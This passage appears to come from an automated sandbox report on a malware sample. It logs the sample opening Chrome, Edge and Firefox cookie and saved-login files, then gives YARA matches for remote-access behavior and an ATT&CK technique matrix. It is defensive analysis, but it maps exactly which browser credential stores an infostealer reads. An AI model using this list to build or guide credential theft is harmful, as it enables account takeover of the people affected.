                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                      Remote Access Functionality

                      Source: Yara matchFile source: Process Memory Space: 84JufgBTrA.exe PID: 5300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7112, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 144 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 41 Registry Run Keys / Startup Folder | 41 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 341 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 33 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 261 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                      [Behavior graph: ID 1511007; Sample: 84JufgBTrA.exe; Startdate: 13/09/2024; Architecture: WINDOWS; Score: 100]

